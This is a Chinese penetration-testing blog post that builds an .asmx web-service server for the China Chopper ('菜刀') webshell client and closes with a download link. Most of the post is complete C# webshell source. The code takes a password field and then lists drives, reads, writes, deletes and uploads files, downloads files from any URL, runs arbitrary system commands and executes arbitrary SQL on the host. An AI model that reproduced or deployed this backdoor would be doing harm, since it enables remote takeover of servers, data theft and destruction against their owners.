菜刀Customize类型服务端asmx版


Jun 24 2015

菜刀Customize类型服务端asmx版

首页 » 渗透测试 » 菜刀Customize类型服务端asmx版   

作者:RedFree

前些天刚学了点ASP.NET的知识,怕学的东西忘了,于是趁热打铁,顺道看了下WebService。WebService这东西以前没有接触过,比较陌生,一点点的搜索,勉勉强强完成了菜刀Customize类型服务端的asmx版。若有错误还请看官指出。
    和其它类型的服务端一样,要完成和服务端的交互,必须具备这两点:1、可以获取参数 2、可以返回内容。于是就从这两个最基本的点入手。
    VS2012新建一个网站,如下图设置:

3.jpg

2.jpg

1.jpg

  可以看到,设置完毕后VS已经生成好了一部分代码。
    按F5键调试一下看看吧:

4.jpg

 点击一下HelloWorld,页面中已经给出了请求和响应的示例:

5.jpg

由于菜刀使用的是HTTP POST协议,所以SOAP请求是用不上了,点击下调用按钮看看吧:

6.jpg

 返回了XML,string标签中包含了代码中返回的"Hello World"。
那么如何获取参数呢?
    尝试改写代码如下:

7.jpg

 出现了错误,经过好一番搜索,得到了解决方法(基础知识太差,这点小问题都耗费了我非常多的时间)。


using System;
using System.Collections.Generic;
using System.Web;
using System.Web.Services;

[WebService(Namespace = "http://tempuri.org/")]
[WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)]

public class Service : System.Web.Services.WebService
{
    public Service () {

        //如果使用设计的组件,请取消注释以下行
        //InitializeComponent();
    }

    [WebMethod]
    public string HelloWorld() {
        String Z = HttpContext.Current.Request.Form["z"];
        return Z;
    }
    
}
  终于得到了理想的效果:


8.jpg

 既然可以获得参数又可以返回结果,把菜刀自带Customize.aspx的代码拿来修改下看看是什么效果。

14.jpg

return 执行结果,浏览器中请求下看效果:

9.jpg

看起来结果似乎是让我满意的,然而当我使用菜刀连接的时候却成了这样:

10.jpg

查看网页源码:

11.jpg

  我去,一些字符被转义了。。。通过:http://www.cnblogs.com/qiantuwuliang/archive/2010/03/29/1699361.html得知可以使用CDATA来解决转义的问题。
    修改源码如下,浏览器中请求下看效果:

12.jpg

13.jpg

获得到了满意的结果(菜刀获取的是->||<-之间的内容,其它的字符不会影响结果的)。当然直接

HttpContext.Current.Response.Write("\x2D\x3E\x7C" + R + "\x7C\x3C\x2D");

也是可行的,虽然会报出XML错误,但不影响执行效果(完美主义者不可选)。
    将cs文件是的代码写到asmx文件中去,最终获得asmx后缀的服务端:


<%@ WebService Language="C#" Class="Service" %>
using System;
using System.Web;
using System.IO;
using System.Net;
using System.Text;
using System.Data;
using System.Data.SqlClient;
using System.Collections.Generic;
using System.Diagnostics;
using System.Web.SessionState;
using System.Web.Services;

[WebService(Namespace = "http://www.wooyun.org/whitehats/RedFree")]
[WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)]

public class Service : System.Web.Services.WebService
{
    public Service()
    {

        //如果使用设计的组件,请取消注释以下行
        //InitializeComponent();
    }

    [WebMethod]
    public string Chopper() {
        String Z = HttpContext.Current.Request.Form["z"];//设置密码
        if (Z != "")
        {
            String Z1 = HttpContext.Current.Request.Form["Z1"];
            String Z2 = HttpContext.Current.Request.Form["Z2"];
            String R = "";
            try
            {
                switch (Z)
                {
                    case "A":
                        {
                            String[] c = Directory.GetLogicalDrives();
                            R = String.Format("{0}\t", HttpContext.Current.Server.MapPath("/"));
                            for (int i = 0; i < c.Length; i++)
                                R += c[i][0] + ":";
                            break;
                        }
                    case "B":
                        {
                            DirectoryInfo m = new DirectoryInfo(Z1);
                            foreach (DirectoryInfo D in m.GetDirectories())
                            {
                                R += String.Format("{0}/\t{1}\t0\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss"));
                            }
                            foreach (FileInfo D in m.GetFiles())
                            {
                                R += String.Format("{0}\t{1}\t{2}\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss"), D.Length);
                            }
                            break;
                        }
                    case "C":
                        {
                            StreamReader m = new StreamReader(Z1, Encoding.Default);
                            R = m.ReadToEnd();
                            m.Close();
                            break;
                        }
                    case "D":
                        {
                            StreamWriter m = new StreamWriter(Z1, false, Encoding.Default);
                            m.Write(Z2);
                            R = "1";
                            m.Close();
                            break;
                        }
                    case "E":
                        {
                            if (Directory.Exists(Z1))
                            {
                                Directory.Delete(Z1, true);
                            }
                            else
                            {
                                File.Delete(Z1);
                            }
                            R = "1";
                            break;
                        }
                    case "F":
                        {
                            HttpContext.Current.Response.Clear();
                            HttpContext.Current.Response.Write("<?xml version=\"1.0\" encoding=\"utf-8\"?>");
                            HttpContext.Current.Response.Write("<data>");
                            HttpContext.Current.Response.Write("<![CDATA[");
                            HttpContext.Current.Response.Write("\x2D\x3E\x7C");
                            HttpContext.Current.Response.WriteFile(Z1);
                            HttpContext.Current.Response.Write("\x7C\x3C\x2D");
                            HttpContext.Current.Response.Write("]]>");
                            HttpContext.Current.Response.Write("</data>");
                            HttpContext.Current.Response.End();
                            goto End;
                        }
                    case "G":
                        {
                            byte[] B = new byte[Z2.Length / 2];
                            for (int i = 0; i < Z2.Length; i += 2)
                            {
                                B[i / 2] = (byte)Convert.ToInt32(Z2.Substring(i, 2), 16);
                            }
                            FileStream fs = new FileStream(Z1, FileMode.Create);
                            fs.Write(B, 0, B.Length);
                            fs.Close();
                            R = "1";
                            break;
                        }
                    case "H":
                        {
                            CP(Z1, Z2);
                            R = "1";
                            break;
                        }
                    case "I":
                        {
                            if (Directory.Exists(Z1))
                            {
                                Directory.Move(Z1, Z2);
                            }
                            else
                            {
                                File.Move(Z1, Z2);
                            }
                            break;
                        }
                    case "J":
                        {
                            Directory.CreateDirectory(Z1);
                            R = "1";
                            break;
                        }
                    case "K":
                        {
                            DateTime TM = Convert.ToDateTime(Z2);
                            if (Directory.Exists(Z1))
                            {
                                Directory.SetCreationTime(Z1, TM);
                                Directory.SetLastWriteTime(Z1, TM);
                                Directory.SetLastAccessTime(Z1, TM);
                            }
                            else
                            {
                                File.SetCreationTime(Z1, TM);
                                File.SetLastWriteTime(Z1, TM);
                                File.SetLastAccessTime(Z1, TM);
                            }
                            R = "1";
                            break;
                        }
                    case "L":
                        {
                            HttpWebRequest RQ = (HttpWebRequest)WebRequest.Create(new Uri(Z1));
                            RQ.Method = "GET";
                            RQ.ContentType = "application/x-www-form-urlencoded";
                            HttpWebResponse WB = (HttpWebResponse)RQ.GetResponse();
                            Stream WF = WB.GetResponseStream();
                            FileStream FS = new FileStream(Z2, FileMode.Create, FileAccess.Write);
                            int i;
                            byte[] buffer = new byte[1024];
                            while (true)
                            {
                                i = WF.Read(buffer, 0, buffer.Length);
                                if (i < 1)
                                {
                                    break;
                                }
                                FS.Write(buffer, 0, i);
                            }
                            WF.Close();
                            WB.Close();
                            FS.Close();
                            R = "1";
                            break;
                        }
                    case "M":
                        {
                            ProcessStartInfo c = new ProcessStartInfo(Z1.Substring(2));
                            Process e = new Process();
                            StreamReader OT, ER;
                            c.UseShellExecute = false;
                            c.RedirectStandardOutput = true;
                            c.RedirectStandardError = true;
                            e.StartInfo = c;
                            c.Arguments = String.Format("{0} {1}", Z1.Substring(0, 2), Z2);
                            e.Start();
                            OT = e.StandardOutput;
                            ER = e.StandardError;
                            e.Close();
                            R = OT.ReadToEnd() + ER.ReadToEnd();
                            break;
                        }
                    case "N":
                        {
                            String strDat = Z1.ToUpper();
                            SqlConnection Conn = new SqlConnection(Z1);
                            Conn.Open();
                            R = Conn.Database + "\t";
                            Conn.Close();
                            break;
                        }
                    case "O":
                        {
                            String[] x = Z1.Replace("\r", "").Split('\n');
                            String strConn = x[0], strDb = x[1];
                            SqlConnection Conn = new SqlConnection(strConn);
                            Conn.Open();
                            DataTable dt = Conn.GetSchema("Columns");
                            Conn.Close();
                            for (int i = 0; i < dt.Rows.Count; i++)
                            {
                                R += String.Format("{0}\t", dt.Rows[i][2].ToString());
                            }
                            break;
                        }
                    case "P":
                        {
                            String[] x = Z1.Replace("\r", "").Split('\n'), p = new String[4];
                            String strConn = x[0], strDb = x[1], strTable = x[2];
                            p[0] = strDb;
                            p[2] = strTable;
                            SqlConnection Conn = new SqlConnection(strConn);
                            Conn.Open();
                            DataTable dt = Conn.GetSchema("Columns", p);
                            Conn.Close();
                            for (int i = 0; i < dt.Rows.Count; i++)
                            {
                                R += String.Format("{0} ({1})\t", dt.Rows[i][3].ToString(), dt.Rows[i][7].ToString());
                            }
                            break;
                        }
                    case "Q":
                        {
                            String[] x = Z1.Replace("\r", "").Split('\n');
                            String strDat, strConn = x[0], strDb = x[1];
                            int i, c;
                            strDat = Z2.ToUpper();
                            SqlConnection Conn = new SqlConnection(strConn);
                            Conn.Open();
                            if (strDat.IndexOf("SELECT ") == 0 || strDat.IndexOf("EXEC ") == 0 || strDat.IndexOf("DECLARE ") == 0)
                            {
                                SqlDataAdapter OD = new SqlDataAdapter(Z2, Conn);
                                DataSet ds = new DataSet();
                                OD.Fill(ds);
                                if (ds.Tables.Count > 0)
                                {
                                    DataRowCollection rows = ds.Tables[0].Rows;
                                    for (c = 0; c < ds.Tables[0].Columns.Count; c++)
                                    {
                                        R += String.Format("{0}\t|\t", ds.Tables[0].Columns[c].ColumnName.ToString());
                                    }
                                    R += "\r\n";
                                    for (i = 0; i < rows.Count; i++)
                                    {
                                        for (c = 0; c < ds.Tables[0].Columns.Count; c++)
                                        {
                                            R += String.Format("{0}\t|\t", rows[i][c].ToString());
                                        }
                                        R += "\r\n";
                                    }
                                }
                                ds.Clear();
                                ds.Dispose();
                            }
                            else
                            {
                                SqlCommand cm = Conn.CreateCommand();
                                cm.CommandText = Z2;
                                cm.ExecuteNonQuery();
                                R = "Result\t|\t\r\nExecute Successfully!\t|\t\r\n";
                            }
                            Conn.Close();
                            break;
                        }
                    default: goto End;
                }
            }
            catch (Exception E)
            {
                R = "ERROR:// " + E.Message;
            }
            HttpContext.Current.Response.Write("<?xml version=\"1.0\" encoding=\"utf-8\"?>");
            HttpContext.Current.Response.Write("<data>");
            HttpContext.Current.Response.Write("<![CDATA[");
            HttpContext.Current.Response.Write("\x2D\x3E\x7C" + R + "\x7C\x3C\x2D");
            HttpContext.Current.Response.Write("]]>");
            HttpContext.Current.Response.Write("</data>");
            HttpContext.Current.Response.End();
        End: ;
        }
        return "";
    }
    public void CP(String S, String D)
    {
        if (Directory.Exists(S))
        {
            DirectoryInfo m = new DirectoryInfo(S);
            Directory.CreateDirectory(D);
            foreach (FileInfo F in m.GetFiles())
            {
                File.Copy(S + "\\" + F.Name, D + "\\" + F.Name);
            }
            foreach (DirectoryInfo F in m.GetDirectories())
            {
                CP(S + "\\" + F.Name, D + "\\" + F.Name);
            }
        }
        else
        {
            File.Copy(S, D);
        }
    }
}



注意下连接地址并不是http://xxx.xx/xx.asmx哦!

15.jpg

16.jpg

17+.jpg

除数据库管理功能外,其它功能测试均正常,如有问题可At我。
百度云盘下载地址:链接: http://pan.baidu.com/s/1sjG83iX 密码: 5f52


Customize(moon).rar

如果您喜欢本博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容:

正文部分到此结束

文章标签:这篇文章木有标签

版权声明:若无特殊注明,本文皆为( mOon )原创,转载请保留文章出处。

也许喜欢: «FREEBUF.COM 被黑数据无乱码 | New IE mutation vector»

你肿么看?

你还可以输入 250/250 个字

 微笑 大笑 拽 大哭 亲亲 流汗 喷血 奸笑 囧 不爽 晕 示爱 害羞 吃惊 惊叹 爱你 吓死了 呵呵

评论信息框

这篇文章还没有收到评论,赶紧来抢沙发吧~